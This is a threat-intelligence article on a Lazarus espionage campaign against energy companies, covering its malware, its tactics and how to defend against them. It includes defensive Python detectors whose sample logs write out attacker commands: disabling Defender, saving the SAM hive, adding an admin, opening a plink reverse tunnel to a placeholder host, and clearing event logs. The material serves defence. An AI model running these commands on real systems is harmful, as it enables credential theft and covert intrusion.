Lazarus, also known as Hidden Cobra or Zinc, is a well-known cyber-espionage threat actor who hails from North Korea, according to the US government. The threat actor has been in business since 2009 and has frequently switched targets over time, probably in line with the interests of the nation-state.
Between 2020 and 2021, Lazarus targeted defense companies in more than a dozen countries, including the US, focusing on selected entities that support strategic sectors such as aerospace and military equipment.
The threat actor is now targeting energy suppliers, according to a new report from Cisco Talos.
Attack modus operandi
Lazarus tends to reuse very similar techniques from one attack to the next, as illustrated by Talos (Figure A).
In the campaign reported by Talos, the initial infection vector is the exploitation of the Log4j vulnerability on internet-facing VMware Horizon servers.
Once the target system is compromised, Lazarus downloads its toolkit from a web server it manages.
Talos observed three variants of the attack, each built around a different set of malware. Lazarus used either VSingle alone, VSingle together with MagicRAT, or a new malware called YamaBot.
The attack variants also involve other tools, such as Mimikatz for credential harvesting, proxy tools to set up SOCKS proxies, and reverse tunneling tools such as Plink.
Lazarus also checks endpoints for installed antivirus software and disables Windows Defender.
The attackers also copy portions of the Windows Registry hives for offline analysis and possible misuse of the credentials and policy information they contain, and gather information from Active Directory before creating their own highly privileged users. These users are removed once the attack is complete, along with the temporary tools, and the Windows event logs are cleared.
At this point the attackers take the time to explore the systems, listing many folders and placing the files of particular interest, usually patented intellectual property, into a RAR archive for exfiltration. The exfiltration is performed through one of the malware families used in the attack.
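The post-exploitation steps just described (Defender tampering, Registry hive copies, creation of privileged users, RAR staging, Plink reverse tunnels, event log clearing) all leave process-creation telemetry behind. The following is an added detection example, not code from the article or from the Talos report: it runs a handful of command-line rules over constructed Windows process-creation records and flags hosts on which several of the steps occur together. The hostnames, account names, file paths and the 203.0.113.0/24 address are placeholders, and the exact command lines the rules match are assumed typical for each step rather than quoted from the report.

```python
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """One process-creation record (the fields a Security 4688 or Sysmon 1 event carries)."""
    host: str
    user: str
    command_line: str


# Detection rules, one per post-exploitation step the article lists. The command
# lines they match are assumed typical for each step, not quoted from the report.
RULES = [
    ("defender_tamper",
     re.compile(r"Set-MpPreference\b.*-Disable\w+", re.I)),
    ("registry_hive_dump",
     re.compile(r"\breg(?:\.exe)?\s+save\s+(?:hklm|hkey_local_machine)\\(?:sam|security|system)\b", re.I)),
    ("user_created",
     re.compile(r"\bnet1?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("local_admin_added",
     re.compile(r"\bnet1?(?:\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I)),
    ("rar_staging",
     re.compile(r"\brar(?:\.exe)?\s+a\b", re.I)),
    ("reverse_ssh_tunnel",
     re.compile(r"\bplink(?:\.exe)?\b.*\s-R\s", re.I)),
    ("eventlog_cleared",
     re.compile(r"\bwevtutil(?:\.exe)?\s+cl\b", re.I)),
]

# Constructed sample telemetry (not real data): a server showing the whole chain
# and a workstation running benign look-alike commands. Hostnames, account names,
# paths and the 203.0.113.0/24 address are placeholders.
SAMPLE_EVENTS = [
    ProcessEvent("horizon-01", "SYSTEM",
                 'powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring $true"'),
    ProcessEvent("horizon-01", "SYSTEM", r"reg.exe save hklm\sam C:\Windows\Temp\sam.hiv"),
    ProcessEvent("horizon-01", "SYSTEM", r"reg.exe save hklm\security C:\Windows\Temp\sec.hiv"),
    ProcessEvent("horizon-01", "SYSTEM", r"net.exe user svc_backup Passw0rd! /add"),
    ProcessEvent("horizon-01", "SYSTEM", r"net.exe localgroup administrators svc_backup /add"),
    ProcessEvent("horizon-01", "SYSTEM", r"C:\Windows\Temp\rar.exe a -r docs.rar D:\Engineering\Designs"),
    ProcessEvent("horizon-01", "SYSTEM", r"C:\Windows\Temp\plink.exe -N -R 8443:127.0.0.1:3389 tunnel@203.0.113.5"),
    ProcessEvent("horizon-01", "SYSTEM", r"wevtutil.exe cl Security"),
    ProcessEvent("ws-07", "jdoe", r"net.exe user jdoe"),
    ProcessEvent("ws-07", "jdoe", r"rar.exe x archive.rar"),
    ProcessEvent("ws-07", "jdoe", r"reg.exe query hklm\software\microsoft"),
]


def scan(events):
    """Return (host, rule_name, command_line) for every event that matches a rule."""
    hits = []
    for ev in events:
        for name, pattern in RULES:
            if pattern.search(ev.command_line):
                hits.append((ev.host, name, ev.command_line))
    return hits


def hosts_with_chain(events, min_rules=3):
    """Hosts on which at least `min_rules` distinct rules fired. A single hit
    (an admin exporting a hive, say) is noise; several of these steps on one
    host is the pattern the article describes."""
    per_host = defaultdict(set)
    for host, name, _ in scan(events):
        per_host[host].add(name)
    return {host: sorted(names) for host, names in per_host.items() if len(names) >= min_rules}


if __name__ == "__main__":
    for host, name, cmd in scan(SAMPLE_EVENTS):
        print(f"{host:11} {name:20} {cmd}")
    print("probable intrusion chain on:", hosts_with_chain(SAMPLE_EVENTS))
```

The per-host correlation in `hosts_with_chain` is the part worth keeping: any one of these commands has a legitimate administrative use, but a hive export followed by a new local administrator, an archive of a design folder, an outbound tunnel and a cleared Security log on the same server has no benign explanation. Against real telemetry the rules would be matched on the normalised command line of 4688 or Sysmon 1 events, and the log-clearing step additionally shows up as Security event 1102 even when the command itself was not captured.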
Exclusive malware developed by Lazarus
Lazarus is a state-sponsored cyber-espionage threat actor with the ability to develop and distribute its own malware families. Lazarus has created several malware families that it uses for its operations. Three different malware families are used in the current campaign exposed by Talos: VSingle, YamaBot and MagicRAT.
VSingle is a persistent backdoor used by the threat actor to perform various activities such as reconnaissance, exfiltration and manual backdoor operations. It is a basic stager that allows the attackers to deploy more malware or open a reverse shell that connects to a C2 server they control, allowing them to execute commands via cmd.exe.
With VSingle, Lazarus typically runs commands on infected computers to collect information about the system and its network. All this information is essential for lateral movement, where the attackers can deploy more malware on other systems or find information to exfiltrate later.
Lazarus has also used VSingle to force the system to cache users’ credentials so that they can be collected afterwards. The threat actor has also used it to grant administrative privileges to users it added to the system. This way, even if the malware is completely removed, the attackers can still access the network via Remote Desktop Protocol (RDP).
Lazarus uses two additional pieces of software alongside VSingle: a utility called Plink, which can create encrypted tunnels between systems via the Secure Shell (SSH) protocol, and another tool called 3proxy, a small, publicly available proxy server.
MagicRAT is the latest malware developed by the Lazarus team, according to Talos. It is a persistent malware written in C++. Interestingly, it uses the Qt framework, a library normally used to build graphical interfaces. Since the RAT has no graphical interface, it is believed that the use of Qt is meant to increase the complexity of malware analysis.
Once active, the malware provides its C2 server with basic information about the system and its environment. It also gives the attacker a remote shell and a few other features, such as automatic self-removal or a sleep function intended to avoid detection.
In some attacks by the Lazarus group, MagicRAT has deployed the VSingle malware.
During one attack, the Lazarus group deployed YamaBot after several attempts to deploy the VSingle malware. YamaBot is written in the Go programming language and, like the other two, begins by collecting basic information about the system.
YamaBot provides the ability to browse folders and display files, download and run files or arbitrary commands on the infected computer, or return information about processes running on the computer.
Energy companies at risk
While Talos doesn’t reveal much about the real targets of this attack campaign, the researchers state that “Lazarus primarily targeted energy companies in Canada, the US and Japan. The main purpose of these attacks was probably to gain long-term access to victim networks to conduct espionage operations in support of the North Korean government’s objectives. This activity aligns with historic Lazarus intrusions targeting critical infrastructure and energy companies to establish long-term access to transfer intellectual property.”
How to protect against the Lazarus cyber-espionage threat
The Lazarus group makes extensive use of common vulnerabilities to compromise businesses. In its current operation, it took advantage of the Log4j vulnerability to gain an initial foothold on networks. Therefore, it is strongly recommended that operating systems and all software be kept up to date and patched to prevent exploitation of such vulnerabilities.
It is also recommended to closely monitor all connections to RDP or VPN services coming from outside the company, as attackers sometimes impersonate employees by using their credentials to log into the system. For this reason it is also recommended to enforce multi-factor authentication (MFA), so that an attacker cannot simply use valid credentials to log into systems.
Finally, security solutions must be deployed and tuned to detect malware and possible misuse of legitimate tools such as Plink.
Disclosure: I work for Trend Micro, but the opinions expressed in this article are mine.
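The two recommendations above about remote access, together with the earlier observation that Lazarus adds its own privileged users and later returns over RDP, translate into a simple logon-log check. The following is an added example, not code from the article or the Talos report: it reads constructed Windows Security records (event 4720 for account creation, 4624 for logons) and flags RDP logons arriving from outside the company as well as any logon by a freshly created account. The internal address ranges, user names, timestamps and the 203.0.113.0/24 and 198.51.100.0/24 addresses are assumptions and placeholders.

```python
import ipaddress
from datetime import datetime, timedelta

LOGON_TYPE_RDP = 10  # Windows "RemoteInteractive" logon type used by RDP sessions

# Address ranges an organisation treats as internal (office LAN, VPN pool). These
# three are an assumption; in practice use your own allocation.
INTERNAL_RANGES = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample Security-log records (not real telemetry). Field names follow
# Windows events 4720 (user account created) and 4624 (successful logon); users,
# times and the 203.0.113.0/24 and 198.51.100.0/24 addresses are placeholders.
SAMPLE_RECORDS = [
    {"EventID": 4720, "TimeCreated": "2022-09-01T02:10:00", "TargetUserName": "svc_backup"},
    {"EventID": 4624, "TimeCreated": "2022-09-01T02:15:00", "TargetUserName": "svc_backup",
     "LogonType": 10, "IpAddress": "203.0.113.5"},
    {"EventID": 4624, "TimeCreated": "2022-09-01T08:30:00", "TargetUserName": "jdoe",
     "LogonType": 10, "IpAddress": "10.20.30.40"},
    {"EventID": 4624, "TimeCreated": "2022-09-01T09:00:00", "TargetUserName": "jdoe",
     "LogonType": 2, "IpAddress": "-"},
    {"EventID": 4624, "TimeCreated": "2022-09-02T23:40:00", "TargetUserName": "asmith",
     "LogonType": 10, "IpAddress": "198.51.100.9"},
]


def is_external(ip):
    """True when the source address lies outside INTERNAL_RANGES.
    Console logons carry '-' instead of an address and count as internal."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    if addr.is_loopback:
        return False
    return not any(addr in net for net in INTERNAL_RANGES)


def find_suspicious_logons(records, new_account_window=timedelta(days=7)):
    """Flag RDP logons that arrive from outside the company and any logon by an
    account created within `new_account_window` before it (the article notes that
    Lazarus adds its own privileged users and later returns over RDP)."""
    created = {}
    for r in records:
        if r["EventID"] == 4720:
            created[r["TargetUserName"]] = datetime.fromisoformat(r["TimeCreated"])

    findings = []
    for r in records:
        if r["EventID"] != 4624:
            continue
        when = datetime.fromisoformat(r["TimeCreated"])
        reasons = []
        if r.get("LogonType") == LOGON_TYPE_RDP and is_external(r.get("IpAddress", "-")):
            reasons.append("rdp_from_external")
        made = created.get(r["TargetUserName"])
        if made is not None and timedelta(0) <= when - made <= new_account_window:
            reasons.append("new_account")
        if reasons:
            findings.append({"user": r["TargetUserName"], "time": r["TimeCreated"],
                             "ip": r.get("IpAddress"), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_logons(SAMPLE_RECORDS):
        print(finding)
```

The check deliberately uses an explicit list of the company's own ranges rather than a generic "private address" test, because a VPN pool or a cloud-hosted jump host is often on public space and still internal. Any external RDP logon is worth a ticket on its own; an external RDP logon by an account that did not exist a week ago is the exact post-intrusion foothold the article describes, and MFA on the RDP or VPN gateway is what stops stolen or attacker-created credentials from being enough.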